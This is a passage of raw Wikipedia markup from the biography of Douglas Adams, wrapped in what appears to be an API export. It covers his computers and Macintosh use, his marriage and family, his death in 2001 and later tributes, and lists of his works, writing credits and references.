International |accessdate=15 November 2013}}</ref>\n* 2015 [[Neil Gaiman]] – ''Immortality and Douglas Adams''<ref>{{cite web|url=http://www.savetherhino.org/events/1059_douglas_adams_memorial_lecture_2015_-_sold_out |title=Douglas Adams Memorial Lecture 2015 |publisher=Save the Rhino International |accessdate=30 January 2015}}</ref>\n* 2016 [[Alice Roberts]] – ''Survivors of the Ice Age''<ref>{{ cite web|url=https://www.savetherhino.org/events/1383_douglas_adams_memorial_lecture_2016|title=Douglas Adams Memorial Lecture 2016 |publisher=Save the Rhino International |accessdate=7 December 2015}}</ref>\n\n===Technology and innovation===\nAdams bought his first [[word processor]] in 1982, having considered one as early as 1979. His first purchase was a 'Nexus'. In 1983, when he and Jane Belson went out to Los Angeles, he bought a [[Digital Equipment Corporation|DEC]] [[Rainbow 100|Rainbow]]. Upon their return to England, Adams bought an [[Apricot Computers|Apricot]], then a [[BBC Micro]] and a [[Tandy 1000]].<ref name=Simpson_184-185>{{Harvnb|Simpson|2003|pp=184–185}}</ref> In ''[[Last Chance to See]]'' Adams mentions his [[Cambridge Z88]], which he had taken to [[Zaire]] on a quest to find the [[northern white rhinoceros]].<ref>{{cite book|author=Adams, Douglas and [[Mark Carwardine]] | title=Last Chance to See | edition=First U.S. Hardcover | publisher=[[Harmony Books]] | year=1991 | page=59 | isbn=0-517-58215-5}}</ref>\n\nAdams's posthumously published work, ''[[The Salmon of Doubt]]'', features multiple articles by him on the subject of technology, including reprints of articles that originally ran in ''[[MacUser]]'' magazine, and in ''[[The Independent on Sunday]]'' newspaper. 
In these Adams claims that one of the first computers he ever saw was a [[Commodore PET]], and that he has \"adored\" his Apple Macintosh (\"or rather my family of however many Macintoshes it is that I've recklessly accumulated over the years\") since he first saw one at Infocom's offices in Boston in 1984.<ref>{{cite book | author=Adams, Douglas | title=The Salmon of Doubt: Hitchhiking the Galaxy One Last Time | edition=First UK hardcover | publisher=Macmillan | year=2002 | pages=90–1 | isbn=0-333-76657-1}}</ref>\n\nAdams was a Macintosh user from the time the machines first came out in 1984 until his death in 2001. He was reputedly the first person to buy a Mac in Europe, the second being [[Stephen Fry]]; some accounts reverse the order, but Fry himself claims he was second to Adams.<ref>{{cite web|url=https://www.youtube.com/watch?v=gx6WPQkhUXI |title=Craig Ferguson 23 February, 2010B Late Late show Stephen Fry PT2 |publisher=YouTube |date=21 June 2010 |accessdate=27 July 2011}}</ref> Adams was also an \"[[AppleMasters|Apple Master]]\", one of several celebrities whom Apple made into spokespeople for its products (other Apple Masters included [[John Cleese]] and [[Gregory Hines]]). Adams's contributions included a rock video that he created using the first version of [[iMovie]], with footage featuring his daughter Polly. The video was available on Adams's [[.Mac]] homepage. Adams installed and started using the first release of [[Mac OS X]] in the weeks leading up to his death. His very last post to his own forum was in praise of Mac OS X and the possibilities of its [[Cocoa (API)|Cocoa]] programming framework. 
He said it was \"awesome...\", which was also the last word he wrote on his site.<ref>{{cite web|url=http://www.douglasadams.com/cgi-bin/mboard/info/dnathread.cgi?2922,1 |title=Adams's final post on his forums at |publisher=Douglasadams.com |accessdate=1 June 2009}}</ref>\n\nAdams used e-mail extensively long before it reached popular awareness, using it to correspond with [[Steve Meretzky]] during the pair's collaboration on Infocom's version of ''[[The Hitchhiker's Guide to the Galaxy (computer game)|The Hitchhiker's Guide to the Galaxy]]''.<ref name=\"Simpson_184-185\"/> While living in New Mexico in 1993 he set up another e-mail address and began posting to his own [[USENET]] newsgroup, alt.fan.douglas-adams, and occasionally, when his computer was acting up, to the comp.sys.mac hierarchy.<ref>{{cite web|url=https://groups.google.com/group/alt.fan.douglas-adams |title=Discussions – alt.fan.douglas-adams | Google Groups |publisher=Google |accessdate=11 March 2013}}</ref> Many of his posts are now archived through Google. Challenges to the authenticity of his messages later led Adams to set up a message forum on his own website to avoid the issue. In 1996, Adams was a keynote speaker at The [[Microsoft]] [[Professional Developers Conference]] (PDC) where he described the personal computer as being a modelling device. The video of his keynote speech is archived on [[Channel 9 (discussion forum)|Channel 9]].<ref>{{cite web |last = Adams |first = Douglas |title = PDC 1996 Keynote with Douglas Adams |work=[[channel9.msdn.com]] |publisher=Channel 9 |date = 15 May 2001 |url = http://channel9.msdn.com/Events/PDC/PDC-1996/PDC-1996-Keynote-with-Douglas-Adams |accessdate =22 March 2013}}</ref>\nAdams was also a keynote speaker for the April 2001 [[Embedded Systems Conference#ESC Silicon Valley|Embedded Systems Conference]] in San Francisco, one of the major technical conferences on [[embedded system]] engineering. 
In his keynote speech, he shared his vision of technology and the part it should play in everyone's everyday life.<ref>{{cite web |last = Cassel |first = David |title = So long, Douglas Adams, and thanks for all the fun |work=[[Salon (website)|Salon]] |publisher=Salon Media Group |date = 15 May 2001 |url = http://archive.salon.com/tech/feature/2001/05/15/douglas_adams/index.html |accessdate =10 July 2009}}</ref>\n\n==Personal life==\nAdams moved to [[Upper Street]], [[Islington]], in 1981<ref name=\"IPP\" /> and to Duncan Terrace, a few minutes' walk away, in the late 1980s.<ref name=\"IPP\" />\n\nIn the early 1980s Adams had an affair with novelist [[Sally Emerson]], who was separated from her husband at that time. Adams later dedicated his book ''[[Life, the Universe and Everything]]'' to Emerson. In 1981 Emerson returned to her husband, [[Peter Stothard]], a contemporary of Adams's at [[Brentwood School (England)|Brentwood School]], and later editor of ''[[The Times]]''. Adams was soon introduced by friends to Jane Belson, with whom he later became romantically involved. Belson was the \"lady barrister\" mentioned in the jacket-flap biography printed in his books during the mid-1980s (\"He [Adams] lives in Islington with a lady barrister and an Apple Macintosh\"). The two lived in Los Angeles together during 1983 while Adams worked on an early screenplay adaptation of ''Hitchhiker's''. 
When the deal fell through, they moved back to London, and after several separations (\"He is currently not certain where he lives, or with whom\")<ref name=sfweekly>{{cite web|last=Bowers |first=Keith |title=Big Three |url=http://www.sfweekly.com/2011-07-06/calendar/big-three/ |work=SF Weekly |accessdate=8 December 2011 |archiveurl=http://www.webcitation.org/63mSWp8yr?url=http%3A%2F%2Fwww.sfweekly.com%2F2011-07-06%2Fcalendar%2Fbig-three%2F |archivedate=8 December 2011 |deadurl=no |date=6 July 2011 |df=dmy }}</ref> and an aborted engagement, they married on 25 November 1991. Adams and Belson had one daughter together, Polly Jane Rocket Adams, born on 22 June 1994, shortly after Adams turned 42. In 1999 the family moved from London to [[Santa Barbara, California]], where they lived until his death. Following the funeral, Jane Belson and Polly Adams returned to London.<ref>Webb, Chapter 10.</ref> Jane died on 7 September 2011 of cancer, aged 59.<ref name=timesobit>{{cite web|title=Obituary & Guest Book Preview for Jane Elizabeth BELSON|url=http://announcements.thetimes.co.uk/obituaries/timesonline-uk/obituary.aspx?page=lifestory&pid=153521790|work=The Times|accessdate=8 December 2011|archiveurl=http://www.webcitation.org/63mSoMnJe|archivedate=8 December 2011|deadurl=no|date=9 September 2011}}</ref><ref name=h2g2obit>{{cite web|title=Jane Belson, Douglas Adams's widow, passed away|url=http://lifednah2g2.blogspot.com/2011/09/jane-belson-douglas-adams-widow-passed.html|work=h2g2|accessdate=9 July 2013}}</ref>\n\n==Death and legacy==\n[[File:Highgate Cemetery - East - Douglas Adams 01.jpg|thumb|Adams's gravestone, [[Highgate Cemetery]], North London]]\nAdams died of a [[heart attack]] on 11 May 2001, aged 49, after resting from his regular workout at a private gym in [[Montecito, California]]. 
He had unknowingly suffered a gradual narrowing of the [[coronary arteries]], which led at that moment to a [[myocardial infarction]] and a fatal [[cardiac arrhythmia]].{{cn|date=October 2016}} Adams had been due to deliver the commencement address at [[Harvey Mudd College]] on 13 May.<ref>{{cite web|url=http://www.laweekly.com/2001-05-24/news/lots-of-screamingly-funny-sentences-no-fish/ |title=Lots of Screamingly Funny Sentences. No Fish. – page 1 |last1=Lewis |first1=Judith |last2=Shulman |first2=Dave |publisher=LA Weekly |date=24 May 2001 |accessdate=20 August 2009 |archiveurl=http://www.webcitation.org/63mQ1aCJQ?url=http%3A%2F%2Fwww.laweekly.com%2F2001-05-24%2Fnews%2Flots-of-screamingly-funny-sentences-no-fish%2F |archivedate=24 May 2001 |deadurl=no |df=dmy }}</ref> His funeral was held on 16 May in Santa Barbara, California. His remains were subsequently cremated and the ashes placed in [[Highgate Cemetery]] in north London in June 2002.<ref name=Simpson_337-338>{{Harvnb|Simpson|2003|pp=337–338}}</ref>\n\nA memorial service was held on 17 September 2001 at [[St Martin-in-the-Fields]] church, [[Trafalgar Square]], London. 
This became the first church service broadcast live on the web by the BBC.<ref>Gaiman, 204.</ref> Video clips of the service are still available on the BBC's website for download.<ref>{{cite web|url=http://www.bbc.co.uk/cult/hitchhikers/celebration/ |title=BBC Online – Cult – Hitchhiker's – Douglas Adams – Service of Celebration |publisher=BBC |date=17 September 2001 |accessdate=11 March 2013}}</ref>\n\nOne of his last public appearances was a talk given at the University of California, Santa Barbara, ''Parrots, the universe and everything'', recorded days before his death.<ref>{{cite web|url=https://www.youtube.com/watch?v=_ZG8HBuDjgc |title=Parrots, the universe and everything, recorded May 2001 |publisher=YouTube |accessdate=11 March 2013}}</ref> A full transcript of the talk is available, and the university has posted the complete video on [https://www.youtube.com/watch?v=_ZG8HBuDjgc YouTube].<ref>{{cite web|url=http://navarroj.com/parrots |title=Transcript of \"Parrots, the Universe and Everything\" |publisher=Navarroj.com |accessdate=27 July 2011}}</ref>\n\nThe [[Minor Planet Center]] named the asteroid [[18610 Arthurdent]] after Adams's character Arthur Dent, coincidentally announcing the name two days before Adams died.<ref name=MPC42677>{{Citation | publication-date = 9 May 2001 | title = New Names of Minor Planets | periodical = [[Minor Planet Circular]] | publication-place = Cambridge, Mass | publisher=[[Minor Planet Center]] | issue = MPC 42677 | url = http://www.minorplanetcenter.net/iau/ECS/MPCArchive/2001/MPC_20010509.pdf | issn = 0736-6884 }}</ref> There is also an [[25924 Douglasadams|asteroid named after Adams himself]].<ref>[http://www.msnbc.msn.com/id/6867061/ Asteroid named after 'Hitchhiker' humorist: Late British sci-fi author honored after cosmic campaign] by Alan Boyle, MSNBC, 25 January 2005</ref>\n\nIn May 2002 ''[[The Salmon of Doubt]]'' was published, containing many short stories, essays, and letters, as well as eulogies from [[Richard Dawkins]], 
[[Stephen Fry]] (in the UK edition), [[Christopher Cerf]] (in the US edition), and [[Terry Jones]] (in the US paperback edition). It also includes eleven chapters of his long-awaited but unfinished novel, ''The Salmon of Doubt'', which was originally intended to become a new [[Dirk Gently]] novel, but might have later become the sixth ''Hitchhiker'' novel.<ref>\n{{cite news\n|url=http://www.independent.co.uk/arts-entertainment/books/reviews/the-salmon-of-doubt-by-douglas-adams-650803.html\n|title=The Salmon of Doubt by Douglas Adams\n|work=The Independent |location=London\n|accessdate=2 August 2009\n|last=Murray\n|first=Charles Shaar\n| date=10 May 2002\n}}\n</ref><ref>\n{{cite news\n|url=http://www.independent.co.uk/arts-entertainment/books/features/cover-stories-douglas-adams-narnia-chronicles-something-like-a-house-672250.html\n|title=Cover Stories: Douglas Adams, Narnia Chronicles, Something like a House\n|work=The Independent |location=London\n|accessdate=2 August 2009\n|author=The Literator\n| date=5 January 2002|archiveurl=https://web.archive.org/web/20090801062359/http://www.independent.co.uk/arts-entertainment/books/features/cover-stories-douglas-adams-narnia-chronicles-something-like-a-house-672250.html|archivedate=1 August 2009 }}\n</ref>\n\nOther events after Adams's death included a [[webcast]] production of ''[[Shada]]'', allowing the complete story to be told, radio dramatisations of the final three books in the ''Hitchhiker's'' series, and the completion of [[The Hitchhiker's Guide to the Galaxy (film)|the film adaptation]] of ''[[The Hitchhiker's Guide to the Galaxy (book)|The Hitchhiker's Guide to the Galaxy]]''. 
The film, released in 2005, posthumously credits Adams as a producer, and several art design elements – including a head-shaped planet seen near the end of the film – incorporated Adams's features.\n\nA 12-part radio series based on the [[Dirk Gently]] novels was announced in 2007, with annual transmissions starting in October.<ref>{{cite web |url=http://www.dirkmaggs.dswilliams.co.uk/Dirk%20Maggs%20News%20%20new%20projects.htm |title=Dirk Maggs News and New Projects page }}{{dead link|date=June 2016|bot=medic}}{{cbignore|bot=medic}}</ref>\n\nBBC Radio 4 also commissioned a third Dirk Gently radio series based on the incomplete chapters of ''The Salmon of Doubt'', and written by [[Kim Fuller]];<ref>{{cite web|author=Matthew Hemley |url=http://www.thestage.co.uk/news/newsstory.php/24312/douglas-adams-final-dirk-gently-novel-to-be |title=The Stage / News / Douglas Adams's final Dirk Gently novel to be adapted for Radio 4 |work=The Stage |date=5 May 2009 |accessdate=20 August 2009}}</ref> but this was dropped in favour of a BBC TV series based on the two completed novels.<ref>{{cite web|url=http://www.chortle.co.uk/news/2009/10/11/9767/bbc_plans_dirk_gently_tv_series|title=BBC plans Dirk Gently TV series|publisher=Chortle.co.uk|date=11 October 2009|accessdate=11 October 2009}}</ref> A sixth ''Hitchhiker'' novel, ''[[And Another Thing... (novel)|And Another Thing...]]'', by ''[[Artemis Fowl (series)|Artemis Fowl]]'' author [[Eoin Colfer]], was released on 12 October 2009 (the 30th anniversary of the first book), published with the full support of Adams's estate. 
A [[BBC Radio 4]] ''[[Book at Bedtime]]'' adaptation and an audio book soon followed.\n\nOn 25 May 2001, two weeks after Adams's death, his fans organised a tribute known as [[Towel Day]], which has been observed every year since then.\n\nIn 2011, over 3,000 people took part in a public vote to choose the subjects of [[Blue plaque|People's Plaques]] in Islington;<ref name=\"IPP\">{{cite web|url=http://www.islington.gov.uk/Leisure/heritage/heritage_borough/bor_plaques/peoplesplaques.asp |title=Islington People's Plaques |date=25 July 2011 |accessdate=13 August 2011 |deadurl=yes |archiveurl=https://web.archive.org/web/20120318001614/http://www.islington.gov.uk/Leisure/heritage/heritage_borough/bor_plaques/peoplesplaques.asp |archivedate=18 March 2012 }}</ref> Adams received 489 votes.\n\nOn 11 March 2013, Adams's 61st birthday was celebrated with an interactive [[Google Doodle]].<ref name=GoogleDoodle2013a>{{cite news|title=Don't Panic! Google Doodle Honors Author Douglas Adams|url=http://abcnews.go.com/blogs/technology/2013/03/dont-panic-google-doodle-honors-author-douglas-adams/|accessdate=11 March 2013|newspaper=abc News|date=11 March 2013}}</ref><ref>{{cite web|title=Douglas Adams' 61st Birthday|url=http://www.google.com/doodles/douglas-adams-61st-birthday|accessdate=11 March 2013}}</ref>\n\n==Awards and nominations==\n{| class=\"wikitable\" style=\"font-size:90%\"\n|- style=\"text-align:center;\"\n! style=\"background:#B0C4DE;\" | Year\n! style=\"background:#B0C4DE;\" | Award\n! style=\"background:#B0C4DE;\" | Work\n! style=\"background:#B0C4DE;\" | Category\n! style=\"background:#B0C4DE;\" | Result\n! 
style=\"background:#B0C4DE;\" | Reference\n|-\n|1979\n|[[Hugo Award]]\n|''[[The Hitchhiker's Guide to the Galaxy (radio series)|The Hitchhiker's Guide to the Galaxy]]''<small>(shared with [[Geoffrey Perkins]])</small>\n|[[Hugo Award for Best Dramatic Presentation|Best Dramatic Presentation]]\n|{{nom}}\n|\n|}\n\n==Works==\n{{Refbegin|20em}}\n* ''[[The Private Life of Genghis Khan]]'' (1975), based on a comedy sketch Adams co-wrote with [[Graham Chapman]] (short story)\n* ''[[The Hitchhiker's Guide to the Galaxy (radio series)|The Hitchhiker's Guide to the Galaxy]]'' (1978) (radio series)\n* ''[[The Hitchhiker's Guide to the Galaxy (book)|The Hitchhiker's Guide to the Galaxy]]'' (1979) (novel)\n* ''[[Shada]]'' (1979–1980), a Doctor Who serial\n* ''[[The Restaurant at the End of the Universe]]'' (1980) (novel)\n* ''[[Life, the Universe and Everything]]'' (1982) (novel)\n* ''[[The Meaning of Liff]]'' (1983 (book), with [[John Lloyd (producer)|John Lloyd]])\n* ''[[So Long, and Thanks for All the Fish]]'' (1984) (novel)\n* ''[[The Hitchhiker's Guide to the Galaxy (computer game)|The Hitchhiker's Guide to the Galaxy]]'' (1984, with [[Steve Meretzky]]) (computer game)\n* ''[[The Hitchhiker's Guide to the Galaxy: The Original Radio Scripts]]'' (1985, with [[Geoffrey Perkins]])\n* ''[[Young Zaphod Plays It Safe]] (short story)'' (1986)\n* ''[[A Christmas Fairly Story]]'' {{sic}} (1986, with [[Terry Jones]]), and\n* ''Supplement to The Meaning of Liff'' (1986, with [[John Lloyd (producer)|John Lloyd]] and [[Stephen Fry]]), both part of\n** ''[[The Utterly Utterly Merry Comic Relief Christmas Book]]'' (1986, edited with [[Peter Fincham]])\n* ''[[Bureaucracy (computer game)|Bureaucracy]]'' (1987) (computer game)\n* ''[[Dirk Gently's Holistic Detective Agency]]'' (1987) (novel)\n* ''[[The Long Dark Tea-Time of the Soul]]'' (1988) (novel)\n* ''[[The Deeper Meaning of Liff]]'' (1990, with [[John Lloyd (producer)|John Lloyd]])\n* ''[[Last Chance to See]]'' (1990, with [[Mark 
Carwardine]]) (book)\n* ''[[Mostly Harmless]]'' (1992) (novel)\n* ''[[The Hitchhiker's Guide to the Galaxy (book)#Illustrated edition|The Illustrated Hitchhiker's Guide to the Galaxy]]'' (1994)\n* ''[[Douglas Adams's Starship Titanic]]'' (1997), written by [[Terry Jones]], based on an idea by Adams\n* ''[[Starship Titanic]]'' (computer game) (1998)\n* ''[[h2g2]]'' (internet project) (1999)\n* ''The Internet: The Last Battleground of the 20th century'' (radio series) (2000)\n* ''[[The Hitchhiker's Guide to the Future]]'' (radio series) (2001) final project for [[BBC Radio 4]] before his death\n* ''[https://www.youtube.com/watch?v=_ZG8HBuDjgc Parrots, the universe and everything]'' (2001)\n* ''[[The Salmon of Doubt]]'' (2002), unfinished novel manuscript (11 chapters), short stories, essays, and interviews (also available as an audiobook, read by [[Simon Jones (actor)|Simon Jones]])\n* ''[[The Hitchhiker's Guide to the Galaxy (film)|The Hitchhiker's Guide to the Galaxy]]'' (2005) (film)\n{{Refend}}\n\n==Writing credits==\n{| class=\"wikitable\"\n|- style=\"background:#ccc; text-align:center;\"\n! Production\n! Notes\n! Broadcaster\n|-\n|''[[Monty Python's Flying Circus]]''\n|\n*\"[[List of Monty Python's Flying Circus episodes#6. 
Party Political Broadcast|Party Political Broadcast on Behalf of the Liberal Party]]\" (1974)\n|[[BBC Two]]\n|-\n|''[[Out of the Trees]]''\n|\n*Television pilot (1976)\n|BBC Two\n|-\n|''[[Doctor on the Go]]''\n|\n*\"For Your Own Good\" (1977)\n|[[ITV (TV network)|ITV]]\n|-\n|''[[Doctor Who]]''\n|\n5 episodes (1978-1979, 1983): \n*\"[[The Pirate Planet]]\" (1978)\n*\"[[Destiny of the Daleks]]\" (1979) (uncredited)\n*\"[[City of Death]]\" (co-written with [[Graham Williams (television producer)|Graham Williams]], 1979)\n*\"[[The Five Doctors]]\" (1983) ([[Shada]] segments; uncredited)\n|[[BBC One]]\n|-\n|''[[Doctor Snuggles]]''\n|\n*\"The Great Disappearing Mystery\" (1979)\n*\"The Remarkable Fidgety River\" (1979)\n|ITV\n|-\n|''[[Not the Nine O'Clock News]]''\n|\n*Unknown episodes (1979)\n|BBC Two\n|-\n|''[[The Hitchhiker's Guide to the Galaxy (TV series)|The Hitchhiker's Guide to the Galaxy]]''\n|\n*6 episodes (1981)\n|BBC Two\n|-\n|''[[Hyperland]]''\n|\n*Television documentary (1990)\n|BBC Two\n|}\n\n==Notes==\n{{reflist|30em}}\n\n==References==\n* Adams, Douglas (1998). [http://www.biota.org/people/douglasadams/ Is there an Artificial God?], speech at ''Digital Biota 2'', Cambridge, England, September 1998.\n* {{cite book|last=Adams|first=Douglas|title=The Salmon of Doubt: Hitchhiking the Galaxy One Last Time|year=2002|publisher=Macmillan|location=London|isbn=0-333-76657-1|ref=harv}}\n* Dawkins, Richard (2003). \"Eulogy for Douglas Adams,\" in ''A devil's chaplain: reflections on hope, lies, science, and love''. Houghton Mifflin Harcourt.\n* Felch, Laura (2004). [http://www.bookslut.com/nonfiction/2004_05_002057.php Don't Panic: Douglas Adams and the Hitchhiker's Guide to the Galaxy by Neil Gaiman], May 2004\n* Ray, Mohit K (2007). ''Atlantic Companion to Literature in English'', Atlantic Publishers and Distributors. ISBN 81-269-0832-7\n* {{cite book|last=Simpson|first=M. 
J.|title=[[Hitchhiker: A Biography of Douglas Adams]]|year=2003|publisher=Justin, Charles & Co|location=Boston, Mass.|isbn=1-932112-17-0|edition=1st|ref=harv}}\n* Webb, Nick (2005a). ''Wish You Were Here: The Official Biography of Douglas Adams''. Ballantine Books. ISBN 0-345-47650-6\n* Webb, Nick (2005b). [http://www.oxforddnb.com/view/article/75853 \"Adams, Douglas Noël (1952–2001)\"], ''Oxford Dictionary of National Biography'', Oxford University Press, January 2005. Retrieved 25 October 2005.\n\n==Further reading==\n===Articles===\n{{Refbegin|30em}}\n* Herbert, R. (1980). The Hitchhiker's Guide to the Galaxy (Book Review). Library Journal, 105(16), 1982.\n* Adams, J., & Brown, R. (1981). The Hitchhiker's Guide to the Galaxy (Book Review). School Library Journal, 27(5), 74.\n* Nickerson, S. L. (1982). The Restaurant at the End of the Universe (Book). Library Journal, 107(4), 476.\n* Nickerson, S. L. (1982). Life, the Universe, and Everything (Book). Library Journal, 107(18), 2007.\n* Morner, C. (1982). The Restaurant at the End of the Universe (Book Review). School Library Journal, 28(8), 87.\n* Morner, C. (1983). Life, the Universe and Everything (Book Review). School Library Journal, 29(6), 93.\n* Shorb, B. (1985). So Long, and Thanks for All the Fish (Book). School Library Journal, 31(6), 90.\n* The Long Dark Tea-Time of the Soul (Book). (1989). Atlantic (02769077), 263(4), 99.\n* Hoffert, B., & Quinn, J. (1990). Last Chance To See (Book). Library Journal, 115(16), 77.\n* Reed, S. S., & Cook, I. I. (1991). Dances with kakapos. People, 35(19), 79.\n* Last Chance to See (Book). (1991). Science News, 139(8), 126.\n* Field, M. M., & Steinberg, S. S. (1991). Douglas Adams. Publishers Weekly, 238(6), 62.\n* Dieter, W. (1991). Last Chance to See (Book). Smithsonian, 22(3), 140.\n* Dykhuis, R. (1991). Last Chance To See (Book). Library Journal, 116(1), 140.\n* Beatty, J. (1991). Good Show (Book). Atlantic (02769077), 267(3), 131.\n* A guide to the future. (1992). 
Maclean's, 106(44), 51.\n* Zinsser, J. (1993). Audio reviews: Fiction. Publishers Weekly, 240(9), 24.\n* Taylor, B., & Annichiarico, M. (1993). Audio reviews. Library Journal, 118(2), 132.\n* Good reads. (1995). NetGuide, 2(4), 109.\n* Stone, B. (1998). The unsinkable starship. Newsweek, 131(15), 78.\n* Gaslin, G. (2001). Galaxy Quest. Entertainment Weekly, (599), 79.\n* So long, and thanks for all the fish. (2001). Economist, 359(8222), 79.\n* Geier, T., & Raftery, B. M. (2001). Legacy. Entertainment Weekly, (597), 11.\n* Passages. (2001). Maclean's, 114(21), 13.\n* Don't panic! Douglas Adams to keynote Embedded show. (2001). Embedded Systems Programming, 14(3), 10.\n* Ehrenman, G. (2001). World Wide Weird. InternetWeek, (862), 15.\n* Zaleski, J. (2002). The Salmon of Doubt (Book). Publishers Weekly, 249(15), 43.\n* Mort, J. (2002). The Salmon of Doubt (Book). Booklist, 98(16), 1386.\n* Lewis, D. L. (2002). Last Time Round The Galaxy. Quadrant Magazine, 46(9), 84.\n* Burns, A. (2002). The Salmon of Doubt (Book). Library Journal, 127(15), 111.\n* Burns, A., & Rhodes, B. (2002). The Restaurant at the End of the Universe (Book). Library Journal, 127(19), 118.\n* Kaveney, R. (2002). A cheerful whale. TLS, (5173), 23.\n* Pearl, N., & Welch, R. (2003). The Hitchhiker's Guide To The Galaxy (Book). Library Journal, 128(11), 124.\n* Preying on composite materials. (2003). R&D Magazine, 45(6), 44.\n* Webb, N. (2003). The Berkeley Hotel hostage. Bookseller, (5069), 25.\n* The author who toured the universe. (2003). Bookseller, (5060), 35.\n* Osmond, A. (2005). Only human. Sight & Sound, 15(5), 12–15.\n* Culture vulture. (2005). Times Educational Supplement, (4640), 19.\n* Maughan, S. (2005). Audio Bestsellers/Fiction. Publishers Weekly, 252(30), 17.\n* Hitchhiker At The Science Museum. (2005). In Britain, 14(10), 9.\n* Rea, A. (2005). The Adams asteroids. New Scientist, 185(2488), 31.\n* Most Improbable Adventure. (2005). 
Popular Mechanics, 182(5), 32.\n* The Hitchhiker's Guide To The Galaxy: The Tertiary Phase. (2005). Publishers Weekly, 252(14), 21.\n* Bartelt, K. R. (2005). Wish You Were Here: The Official Biography of Douglas Adams. Library Journal, 130(4), 86.\n* Larsen, D. (2005). I was a teenage android. New Zealand Listener, 198(3390), 37–38.\n* Tanner, J. C. (2005). Simplicity: it's hard. Telecom Asia, 16(6), 6.\n* Nielsen Bookscan Charts. (2005). Bookseller, (5175), 18–21.\n* Buena Vista launches regional site to push Hitchhiker's movie. (2005). New Media Age, 9.\n* Shynola bring Beckland to life. (2005). Creative Review, 25(3), 24–26.\n* Carwardine, M. (15 September 2007). The baiji: So long and thanks for all the fish. New Scientist. pp. 50–53.\n* Czarniawska, B. (2008). Accounting and gender across times and places: An excursion into fiction. Accounting, Organizations & Society, 33(1), 33–47.\n* Pope, M. (2008). Life, the Universe, Religion and Science. Issues, (82), 31–34.\n* Bearne, S. (2008). BBC builds site to trail Last Chance To See TV series. New Media Age, 08.\n* Arrow to reissue Adams. (2008). Bookseller, (5352), 14.\n* Page, B. (2008). Colfer is new Hitchhiker. Bookseller, (5350), 7.\n* I've got a perfect puzzle for you. (2009). Bookseller, (5404), 42.\n* Mostly Harmless.... (2009). Bookseller, (5374), 46.\n* Penguin and PanMac hitch a ride together. (2009). Bookseller, (5373), 6.\n* Adams, Douglas. Britannica Biographies [serial online]. October 2010;:1\n* Douglas (Noël) Adams (1952–2001). Hutchinson's Biography Database [serial online]. July 2011;:1\n* My life in books. (2011). 
Times Educational Supplement, (4940), 27.\n{{Refend}}\n\n===Other===\n* {{Wayback |df=yes|date=20110720193159 |url=http://www.douglasadams.com/ |title=Adams's official web site }}, established by him, and still operated by [[The Digital Village]]\n* {{TED speaker|douglas_adams}}\n* [http://www.biota.org/people/douglasadams/ Douglas Adams speech at Digital Biota 2 (1998)] [http://www.biota.org/podcast/#DNA (The audio of the speech)]\n* [http://www.guardian.co.uk/books/2008/jun/09/douglasadams Guardian Books \"Author Page\"], with profile and links to further articles.\n* {{Worldcat id|id=lccn-n80-76765}}\n* [http://www.vintagemacworld.com/iifx.html Douglas Adams & his Computer] article about his Mac IIfx\n* BBC2 \"Omnibus\" tribute to Adams, presented by Kirsty Wark, 4 August 2001\n* Mueller, Rick and Greengrass, Joel (2002). ''Life, The Universe and Douglas Adams'', documentary.\n* Simpson, M.J. (2001). ''The Pocket Essential Hitchhiker's Guide''. ISBN 1-903047-40-4. Updated April 2005 ISBN 1-904048-46-3\n* [http://www.bbc.co.uk/programmes/p00fpvbm Special edition of BBC Book Club featuring Douglas Adams], first broadcast 2 January 2000 on BBC Radio 4\n\n==External links==\n{{Library resources box\n |by=yes\n |viaf=113230702\n |label=Douglas Adams}}\n{{Spoken Wikipedia-2|2006-02-11|Douglas_Adams_Part_1.ogg|Douglas_Adams_Part_2.ogg}}\n* {{Commons category-inline}}\n* {{Wikiquote-inline}}\n* {{Find a Grave|22814}}\n* {{IMDb name|0010930}}\n* [http://towelday.org/ Towel Day, 25 May]\n\n{{s-start}}\n{{s-bef|before= [[Anthony Read]]}} \n{{s-ttl|title=''[[Doctor Who]]'' script editor|years=1979–80}} \n{{s-aft|after= [[Christopher H. 
Bidmead]]}}\n{{s-end}}\n{{Douglas Adams}}\n{{HitchhikerBooks}}\n{{Dirk Gently}}\n{{Doctor Who}}\n{{Infocom games}}\n{{animal rights|state=collapsed}}\n\n{{Authority control}}\n\n{{DEFAULTSORT:Adams, Douglas}}\n[[Category:Douglas Adams| ]]\n[[Category:1952 births]]\n[[Category:2001 deaths]]\n[[Category:Alumni of St John's College, Cambridge]]\n[[Category:Animal rights advocates]]\n[[Category:Atheism activists]]\n[[Category:Audio book narrators]]\n[[Category:British social commentators]]\n[[Category:BBC radio producers]]\n[[Category:British child writers]]\n[[Category:Burials at Highgate Cemetery]]\n[[Category:English atheists]]\n[[Category:English comedy writers]]\n[[Category:English humanists]]\n[[Category:English humorists]]\n[[Category:English radio writers]]\n[[Category:English science fiction writers]]\n[[Category:English television writers]]\n[[Category:Infocom]]\n[[Category:Interactive fiction writers]]\n[[Category:Monty Python]]\n[[Category:Non-fiction environmental writers]]\n[[Category:People educated at Brentwood School (Essex)]]\n[[Category:People from Cambridge]]\n[[Category:Usenet people]]\n[[Category:Critics of religions]]\n[[Category:20th-century English novelists]]\n[[Category:21st-century British novelists]]",
"properties": {
"defaultsort": "Adams, Douglas",
"wikibase_item": "Q42"
},
"parsetree": "<root><template><title>other people</title></template>\n<template lineStart=\"1\"><title>Use British English</title><part><name>date</name><equals>=</equals><value>October 2013</value></part></template>\n<template lineStart=\"1\"><title>Use dmy dates</title><part><name>date</name><equals>=</equals><value>April 2015</value></part></template>\n<template lineStart=\"1\"><title>Infobox writer <comment><!-- for more information see [[:Template:Infobox writer/doc]] --></comment>\n</title><part><name> name </name><equals>=</equals><value> Douglas Adams\n</value></part><part><name> image </name><equals>=</equals><value> Douglas adams portrait cropped.jpg\n</value></part><part><name> caption </name><equals>=</equals><value>\n</value></part><part><name> birth_name </name><equals>=</equals><value> Douglas Noel Adams\n</value></part><part><name> birth_date </name><equals>=</equals><value> <template><title>birth date</title><part><name index=\"1\"/><value>1952</value></part><part><name index=\"2\"/><value>3</value></part><part><name index=\"3\"/><value>11</value></part><part><name>df</name><equals>=</equals><value>yes</value></part></template>\n</value></part><part><name> birth_place </name><equals>=</equals><value> [[Cambridge]], England\n</value></part><part><name> height </name><equals>=</equals><value> <template><title>height</title><part><name>ft</name><equals>=</equals><value>6</value></part><part><name>in</name><equals>=</equals><value>5</value></part></template>\n</value></part><part><name> death_date </name><equals>=</equals><value> <template><title>Death date and age</title><part><name index=\"1\"/><value>2001</value></part><part><name index=\"2\"/><value>5</value></part><part><name 